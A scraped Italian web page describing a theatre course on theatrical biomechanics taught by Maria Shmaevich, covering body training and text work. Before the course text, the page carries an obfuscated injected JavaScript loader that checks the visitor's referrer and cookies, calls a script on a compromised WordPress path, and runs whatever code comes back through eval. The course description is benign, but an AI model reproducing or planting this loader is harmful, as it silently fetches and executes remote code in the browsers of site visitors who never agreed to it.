;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//accademiadeifilodrammatici.it/restyling/wp-admin/css/css.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

Dalla biomeccanica teatrale all’azione

DALLA BIOMECCANICA TEATRALE ALL'AZIONE

 

Docente: Maria Shmaevich

 


Attraverso l'allenamento del corpo prima e lo studio dei testi poi, si arriva ad assimilare e riprodurre i principi della Biomeccanica Teatrale.


 

Da subito il lavoro inizia a svilupparsi in due direzioni.
Da una parte si lavora sul corpo dell'attore: vengono introdotte e assimilate le basi del movimento scenico e cominciano a essere applicati i principi di Biomeccanica Teatrale.
Dall'altra parte comincia lavoro con il testo drammaturgico e vengono introdotte le basi di recitazione con l'uso della Biomeccanica Teatrale: si inizia dall'analisi del testo per passare subito alla ricerca dell'azione espressiva. Gradualmente tutti i concetti di Biomeccanica Teatrale vengono ampliati e approfonditi nella loro applicazione al lavoro con testo.

 
DSC01558

 


 

< I SEMINARI